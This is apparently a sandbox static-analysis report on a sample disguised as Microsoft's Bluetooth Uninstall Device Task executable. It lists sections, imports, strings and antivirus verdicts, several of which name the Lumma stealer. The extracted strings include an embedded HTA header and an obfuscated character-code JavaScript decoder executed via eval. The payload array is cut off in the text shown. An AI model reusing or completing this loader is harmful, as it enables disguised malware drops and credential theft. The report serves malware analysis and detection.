popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2039-04-27 21:10:02

PDB Path

BthUdTask.pdb

PE Imphash

ab106f86dfb187b013004b44c843d3e8

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00001390 0x00001400 5.7140045419
.data 0x00003000 0x0000037c 0x00000200 0.183338791656
.idata 0x00004000 0x00000544 0x00000600 4.6171651967
.didat 0x00005000 0x0000001c 0x00000200 0.21310128451
.rsrc 0x00006000 0x00006f68 0x00007000 3.83663726706
.reloc 0x0000d000 0x000001a0 0x00000200 5.42843494427

Resources

Name Offset Size Language Sub-language File type
MUI 0x0000ce90 0x000000d8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0000a758 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0000a758 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0000a758 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0000a758 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0000a758 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0000a758 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0000a758 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0000a758 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x0000a758 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x0000cd88 0x00000108 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_GROUP_ICON 0x0000cd00 0x00000084 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_VERSION 0x00006768 0x000003ac LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x00006370 0x000003f6 LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document, ASCII text, with CRLF line terminators

Imports

Library KERNEL32.dll:
0x40402c CloseHandle
0x404030 SetEvent
0x40403c TerminateProcess
0x404040 GetCurrentProcess
0x404048 GetTickCount
0x404050 GetCurrentThreadId
0x404054 GetCurrentProcessId
0x40405c GetLastError
0x404060 OpenEventW
0x404068 Sleep
0x404070 GetModuleHandleW
Library msvcrt.dll:
0x404078 _controlfp
0x40407c ?terminate@@YAXXZ
0x404084 _initterm
0x404088 __setusermatherr
0x40408c __p__fmode
0x404090 memset
0x404094 _exit
0x404098 exit
0x40409c __set_app_type
0x4040a0 __wgetmainargs
0x4040a4 _amsg_exit
0x4040a8 __p__commode
0x4040ac _XcptFilter
0x4040b0 _vsnwprintf
0x4040b4 _cexit
Library ADVAPI32.dll:
0x404000 RegQueryValueExW
0x404004 RegCloseKey
Library DEVOBJ.dll:
0x40400c DevObjGetClassDevs
0x404014 DevObjOpenDevRegKey
!This program cannot be run in DOS mode.
`.data
.idata
@.didat
@.reloc
ext-ms-win-setupapi-classinstallers-l1-1-0.dll
ext-ms-win-setupapi-classinstallers-l1-1-1.dll
ext-ms-win-newdev-config-l1-1-0.dll
BthUdTask.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.giats
.rdata
.rdata$sxdata
.rdata$zzzdbg
.text$mn
.xdata$x
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.didat$5
.rsrc$01
.rsrc$02
F95t3@
t#hx3@
QRPhl"@
SetupDiDestroyDeviceInfoList
SetupDiCreateDeviceInfoList
SetupDiOpenDeviceInfoW
DiUninstallDevice
OpenEventW
GetLastError
SetEvent
CloseHandle
KERNEL32.dll
_vsnwprintf
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_except_handler4_common
msvcrt.dll
?terminate@@YAXXZ
_controlfp
RegQueryValueExW
RegCloseKey
ADVAPI32.dll
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
CompareStringOrdinal
ResolveDelayLoadedAPI
DelayLoadFailureHook
DevObjEnumDeviceInfo
DevObjUninstallDevice
DevObjDestroyDeviceInfoList
DevObjGetDeviceInstanceId
DevObjGetClassDevs
DevObjCreateDeviceInfoList
DevObjOpenDevRegKey
DEVOBJ.dll
memset
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Bluetooth.UninstallDeviceTask"
type="win32"/>
<description>Bluetooth Uninstall Device Task</description>
<!-- Identify the application security requirements. -->
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="requireAdministrator"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<autoElevate>true</autoElevate>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
dB@`Dg
pBD$d`
vDBB@d
tdd$FvD$FDdF
DdFDd'
`B@`DDp
tdDF@dF
BDdd$dd
Dd$$F@
dBD$dd@
DdFFDd
FDdB@B@
@`BDdd`
dDddFD
dFD`@@`
@`BB@h
t$$FFdP
DB@`B@
vDdFD`
BDdhd@d
t`BDBF
ddBDdF
@BD`B@
t`B@F`
dd`FDd
F@dFDp
t`dB@g
dFBDdp
FFDtB@D`p
@`ddd`p
h~~~~b
h~~~~~g
h~~~~~~g
h~~el~~~g
q~~~g
P~~~yA
+z~~~_
P~~~~B
V~~~z9
O~~~y7
Y~~~y9
O~~~yHg~~XX~~~w/
O~~~yt~~t~~~y/
J~~~~~~~~~t7
J~~~~~~~t1
K~~~~~t/
k~~~~Z
b~~~~~zH
\~~~~~~~~H
\~~~~~~~~~~J
b~~~qp~~nw~~~H
b~~~t/f~~VB~~~~H
`~~~p
H~~~~P
b~~~w/
A~~~~P
S~~~p-
/~~~~\
7~~~~]
g~~S/y~~~]
h~~kn~~~]
h~~~~~~]
h~~~~~]
h~~~~Z
0D0H0P0X0p0
6?6F6l6
7'7B7t7
8%9C9L9R9Z9`9x9
:0:R:]:o:w:|:
;$;.;M;S;];c;l;q;
<B<G<b<
?%?:?O?^?f?{?
0/050;0A0G0M0T0[0b0i0p0w0~0
1&141A1O1\1j1t1
2$2(2D2H2d2h2
<HTA:APPLICATION CAPTION = "no" WINDOWSTATE = "minimize" SHOWINTASKBAR = "no" >MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.didat
@.reloc
ext-ms-win-setupapi-classinstallers-l1-1-0.dll
ext-ms-win-setupapi-classinstallers-l1-1-1.dll
ext-ms-win-newdev-config-l1-1-0.dll
BthUdTask.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.giats
.rdata
.rdata$sxdata
.rdata$zzzdbg
.text$mn
.xdata$x
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.didat$5
.rsrc$01
.rsrc$02
F95t3@
t#hx3@
QRPhl"@
SetupDiDestroyDeviceInfoList
SetupDiCreateDeviceInfoList
SetupDiOpenDeviceInfoW
DiUninstallDevice
OpenEventW
GetLastError
SetEvent
CloseHandle
KERNEL32.dll
_vsnwprintf
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_except_handler4_common
msvcrt.dll
?terminate@@YAXXZ
_controlfp
RegQueryValueExW
RegCloseKey
ADVAPI32.dll
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
CompareStringOrdinal
ResolveDelayLoadedAPI
DelayLoadFailureHook
DevObjEnumDeviceInfo
DevObjUninstallDevice
DevObjDestroyDeviceInfoList
DevObjGetDeviceInstanceId
DevObjGetClassDevs
DevObjCreateDeviceInfoList
DevObjOpenDevRegKey
DEVOBJ.dll
memset
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Bluetooth.UninstallDeviceTask"
type="win32"/>
<description>Bluetooth Uninstall Device Task</description>
<!-- Identify the application security requirements. -->
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="requireAdministrator"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<autoElevate>true</autoElevate>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
dB@`Dg
pBD$d`
vDBB@d
tdd$FvD$FDdF
DdFDd'
`B@`DDp
tdDF@dF
BDdd$dd
Dd$$F@
dBD$dd@
DdFFDd
FDdB@B@
@`BDdd`
dDddFD
dFD`@@`
@`BB@h
t$$FFdP
DB@`B@
vDdFD`
BDdhd@d
t`BDBF
ddBDdF
@BD`B@
t`B@F`
dd`FDd
F@dFDp
t`dB@g
dFBDdp
FFDtB@D`p
@`ddd`p
h~~~~b
h~~~~~g
h~~~~~~g
h~~el~~~g
q~~~g
P~~~yA
+z~~~_
P~~~~B
V~~~z9
O~~~y7
Y~~~y9
O~~~yHg~~XX~~~w/
O~~~yt~~t~~~y/
J~~~~~~~~~t7
J~~~~~~~t1
K~~~~~t/
k~~~~Z
b~~~~~zH
\~~~~~~~~H
\~~~~~~~~~~J
b~~~qp~~nw~~~H
b~~~t/f~~VB~~~~H
`~~~p
H~~~~P
b~~~w/
A~~~~P
S~~~p-
/~~~~\
7~~~~]
g~~S/y~~~]
h~~kn~~~]
h~~~~~~]
h~~~~~]
h~~~~Z
0D0H0P0X0p0
6?6F6l6
7'7B7t7
8%9C9L9R9Z9`9x9
:0:R:]:o:w:|:
;$;.;M;S;];c;l;q;
<B<G<b<
?%?:?O?^?f?{?
0/050;0A0G0M0T0[0b0i0p0w0~0
1&141A1O1\1j1t1
2$2(2D2H2d2h2
<script>
MB=102;Vj=117;UX=110;ff=99;Az=116;jT=105;Gv=111;Bh=32;wp=97;zh=98;Bu=40;xQ=73;nZ=74;Jg=41;Wq=123;qQ=118;lX=114;Xn=66;bx=120;VR=89;QB=61;Wd=34;eu=59;Zy=104;Pg=86;jC=80;Xw=48;eS=60;EF=46;wu=108;Nz=101;JJ=103;JS=43;ii=119;YN=83;Gz=90;Ui=109;Rz=67;XT=100;ls=91;AL=93;Qq=45;Gn=53;sp=55;tF=57;jW=125;Ba=112;DR=106;rN=54;UL=49;Lq=44;aB=56;Zk=51;ip=52;ee=50;uk=77;TD=71;tC=75;iT=65;DV=88;as=79;pT=82;var wIx = String.fromCharCode(MB,Vj,UX,ff,Az,jT,Gv,UX,Bh,wp,zh,UX,Bu,xQ,Gv,nZ,Jg,Wq,qQ,wp,lX,Bh,Xn,bx,VR,QB,Bh,Wd,Wd,eu,MB,Gv,lX,Bh,Bu,qQ,wp,lX,Bh,Zy,Pg,jC,Bh,QB,Bh,Xw,eu,Bh,Zy,Pg,jC,Bh,eS,Bh,xQ,Gv,nZ,EF,wu,Nz,UX,JJ,Az,Zy,eu,Bh,Zy,Pg,jC,JS,JS,Jg,Bh,Wq,qQ,wp,lX,Bh,ii,YN,Gz,Bh,QB,Bh,YN,Az,lX,jT,UX,JJ,EF,MB,lX,Gv,Ui,Rz,Zy,wp,lX,Rz,Gv,XT,Nz,Bu,xQ,Gv,nZ,ls,Zy,Pg,jC,AL,Bh,Qq,Bh,Gn,sp,tF,Jg,eu,Xn,bx,VR,Bh,QB,Bh,Xn,bx,VR,Bh,JS,Bh,ii,YN,Gz,jW,lX,Nz,Az,Vj,lX,UX,Bh,Xn,bx,VR,jW,eu,qQ,wp,lX,Bh,Nz,Ba,DR,Bh,QB,Bh,wp,zh,UX,Bu,ls,rN,tF,UL,Lq,rN,tF,Xw,Lq,rN,tF,aB,Lq,rN,aB,Xw,Lq,rN,tF,Zk,Lq,rN,tF,ip,Lq,rN,aB,Zk,Lq,rN,aB,Xw,Lq,rN,aB,sp,Lq,rN,aB
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.didat
@.reloc
ext-ms-win-setupapi-classinstallers-l1-1-0.dll
ext-ms-win-setupapi-classinstallers-l1-1-1.dll
ext-ms-win-newdev-config-l1-1-0.dll
BthUdTask.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.giats
.rdata
.rdata$sxdata
.rdata$zzzdbg
.text$mn
.xdata$x
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.didat$5
.rsrc$01
.rsrc$02
F95t3@
t#hx3@
QRPhl"@
SetupDiDestroyDeviceInfoList
SetupDiCreateDeviceInfoList
SetupDiOpenDeviceInfoW
DiUninstallDevice
OpenEventW
GetLastError
SetEvent
CloseHandle
KERNEL32.dll
_vsnwprintf
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_except_handler4_common
msvcrt.dll
?terminate@@YAXXZ
_controlfp
RegQueryValueExW
RegCloseKey
ADVAPI32.dll
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
CompareStringOrdinal
ResolveDelayLoadedAPI
DelayLoadFailureHook
DevObjEnumDeviceInfo
DevObjUninstallDevice
DevObjDestroyDeviceInfoList
DevObjGetDeviceInstanceId
DevObjGetClassDevs
DevObjCreateDeviceInfoList
DevObjOpenDevRegKey
DEVOBJ.dll
memset
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Bluetooth.UninstallDeviceTask"
type="win32"/>
<description>Bluetooth Uninstall Device Task</description>
<!-- Identify the application security requirements. -->
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="requireAdministrator"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<autoElevate>true</autoElevate>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
dB@`Dg
pBD$d`
vDBB@d
tdd$FvD$FDdF
DdFDd'
`B@`DDp
tdDF@dF
BDdd$dd
Dd$$F@
dBD$dd@
DdFFDd
FDdB@B@
@`BDdd`
dDddFD
dFD`@@`
@`BB@h
t$$FFdP
DB@`B@
vDdFD`
BDdhd@d
t`BDBF
ddBDdF
@BD`B@
t`B@F`
dd`FDd
F@dFDp
t`dB@g
dFBDdp
FFDtB@D`p
@`ddd`p
h~~~~b
h~~~~~g
h~~~~~~g
h~~el~~~g
q~~~g
P~~~yA
+z~~~_
P~~~~B
V~~~z9
O~~~y7
Y~~~y9
O~~~yHg~~XX~~~w/
O~~~yt~~t~~~y/
J~~~~~~~~~t7
J~~~~~~~t1
K~~~~~t/
k~~~~Z
b~~~~~zH
\~~~~~~~~H
\~~~~~~~~~~J
b~~~qp~~nw~~~H
b~~~t/f~~VB~~~~H
`~~~p
H~~~~P
b~~~w/
A~~~~P
S~~~p-
/~~~~\
7~~~~]
g~~S/y~~~]
h~~kn~~~]
h~~~~~~]
h~~~~~]
h~~~~Z
0D0H0P0X0p0
6?6F6l6
7'7B7t7
8%9C9L9R9Z9`9x9
:0:R:]:o:w:|:
;$;.;M;S;];c;l;q;
<B<G<b<
?%?:?O?^?f?{?
0/050;0A0G0M0T0[0b0i0p0w0~0
1&141A1O1\1j1t1
2$2(2D2H2d2h2
<script>
eval(wIx)
window.close();
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.didat
@.reloc
ext-ms-win-setupapi-classinstallers-l1-1-0.dll
ext-ms-win-setupapi-classinstallers-l1-1-1.dll
ext-ms-win-newdev-config-l1-1-0.dll
BthUdTask.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.giats
.rdata
.rdata$sxdata
.rdata$zzzdbg
.text$mn
.xdata$x
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.didat$5
.rsrc$01
.rsrc$02
F95t3@
t#hx3@
QRPhl"@
SetupDiDestroyDeviceInfoList
SetupDiCreateDeviceInfoList
SetupDiOpenDeviceInfoW
DiUninstallDevice
OpenEventW
GetLastError
SetEvent
CloseHandle
KERNEL32.dll
_vsnwprintf
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_except_handler4_common
msvcrt.dll
?terminate@@YAXXZ
_controlfp
RegQueryValueExW
RegCloseKey
ADVAPI32.dll
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
CompareStringOrdinal
ResolveDelayLoadedAPI
DelayLoadFailureHook
DevObjEnumDeviceInfo
DevObjUninstallDevice
DevObjDestroyDeviceInfoList
DevObjGetDeviceInstanceId
DevObjGetClassDevs
DevObjCreateDeviceInfoList
DevObjOpenDevRegKey
DEVOBJ.dll
memset
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Bluetooth.UninstallDeviceTask"
type="win32"/>
<description>Bluetooth Uninstall Device Task</description>
<!-- Identify the application security requirements. -->
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="requireAdministrator"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<autoElevate>true</autoElevate>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
dB@`Dg
pBD$d`
vDBB@d
tdd$FvD$FDdF
DdFDd'
`B@`DDp
tdDF@dF
BDdd$dd
Dd$$F@
dBD$dd@
DdFFDd
FDdB@B@
@`BDdd`
dDddFD
dFD`@@`
@`BB@h
t$$FFdP
DB@`B@
vDdFD`
BDdhd@d
t`BDBF
ddBDdF
@BD`B@
t`B@F`
dd`FDd
F@dFDp
t`dB@g
dFBDdp
FFDtB@D`p
@`ddd`p
h~~~~b
h~~~~~g
h~~~~~~g
h~~el~~~g
q~~~g
P~~~yA
+z~~~_
P~~~~B
V~~~z9
O~~~y7
Y~~~y9
O~~~yHg~~XX~~~w/
O~~~yt~~t~~~y/
J~~~~~~~~~t7
J~~~~~~~t1
K~~~~~t/
k~~~~Z
b~~~~~zH
\~~~~~~~~H
\~~~~~~~~~~J
b~~~qp~~nw~~~H
b~~~t/f~~VB~~~~H
`~~~p
H~~~~P
b~~~w/
A~~~~P
S~~~p-
/~~~~\
7~~~~]
g~~S/y~~~]
h~~kn~~~]
h~~~~~~]
h~~~~~]
h~~~~Z
0D0H0P0X0p0
6?6F6l6
7'7B7t7
8%9C9L9R9Z9`9x9
:0:R:]:o:w:|:
;$;.;M;S;];c;l;q;
<B<G<b<
?%?:?O?^?f?{?
0/050;0A0G0M0T0[0b0i0p0w0~0
1&141A1O1\1j1t1
2$2(2D2H2d2h2
lbthenum
BTHLEDevice
Global\BTH_UNINSTALL_DEVICE_%s
Bluetooth_UniqueID
IDI_BTH_UD_TASK
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Bluetooth Uninstall Device Task
FileVersion
10.0.17763.1 (WinBuild.160101.0800)
InternalName
BthUdTask
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
BthUdTask.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.17763.1
VarFileInfo
Translation
Bluetooth Uninstall Device TaskLUninstalls the PnP device associated with the specified Bluetooth service ID
Microsoft
lbthenum
BTHLEDevice
Global\BTH_UNINSTALL_DEVICE_%s
Bluetooth_UniqueID
IDI_BTH_UD_TASK
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Bluetooth Uninstall Device Task
FileVersion
10.0.17763.1 (WinBuild.160101.0800)
InternalName
BthUdTask
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
BthUdTask.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.17763.1
VarFileInfo
Translation
Bluetooth Uninstall Device TaskLUninstalls the PnP device associated with the specified Bluetooth service ID
Microsoft
lbthenum
BTHLEDevice
Global\BTH_UNINSTALL_DEVICE_%s
Bluetooth_UniqueID
IDI_BTH_UD_TASK
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Bluetooth Uninstall Device Task
FileVersion
10.0.17763.1 (WinBuild.160101.0800)
InternalName
BthUdTask
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
BthUdTask.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.17763.1
VarFileInfo
Translation
Bluetooth Uninstall Device TaskLUninstalls the PnP device associated with the specified Bluetooth service ID
Microsoft
lbthenum
BTHLEDevice
Global\BTH_UNINSTALL_DEVICE_%s
Bluetooth_UniqueID
IDI_BTH_UD_TASK
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Bluetooth Uninstall Device Task
FileVersion
10.0.17763.1 (WinBuild.160101.0800)
InternalName
BthUdTask
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
BthUdTask.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.17763.1
VarFileInfo
Translation
Bluetooth Uninstall Device TaskLUninstalls the PnP device associated with the specified Bluetooth service ID
Microsoft
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Lumma.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Artemis!Trojan
McAfee Artemis!DB1AE063D1BE
Cylance Clean
Zillya Clean
Sangfor Trojan.Win32.Agent.Vchg
K7AntiVirus Clean
Alibaba Trojan:JS/Lumma.36daf95e
K7GW Clean
Cybereason Clean
huorong Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of JS/Agent.RNX
APEX Clean
Avast Win32:Lumma-E [Drp]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
TACHYON Clean
Sophos Clean
F-Secure Malware.JS/Agent.mshgh
DrWeb Clean
VIPRE Clean
TrendMicro TrojanSpy.Win32.LUMMASTEALER.YXEG5Z
McAfeeD ti!1F194878AA55
Trapmine Clean
FireEye Clean
Emsisoft Clean
Ikarus Trojan.JS.Agent
GData Clean
Jiangmin Clean
Webroot Clean
Varist Clean
Avira JS/Agent.mshgh
Antiy-AVL Clean
Kingsoft Win32.Troj.Unknown.a
Gridinsoft Trojan.Win32.Downloader.oa!s1
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
MAX Clean
VBA32 Clean
Malwarebytes Trojan.Downloader
Panda Clean
Zoner Clean
TrendMicro-HouseCall TrojanSpy.Win32.LUMMASTEALER.YXEG5Z
Rising Trojan.Agent/JS!8.11351 (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet JS/Agent.RNX!tr
AVG Win32:Lumma-E [Drp]
DeepInstinct MALICIOUS
CrowdStrike Clean
alibabacloud Trojan:Javascript/Agent.RTF
No IRMA results available.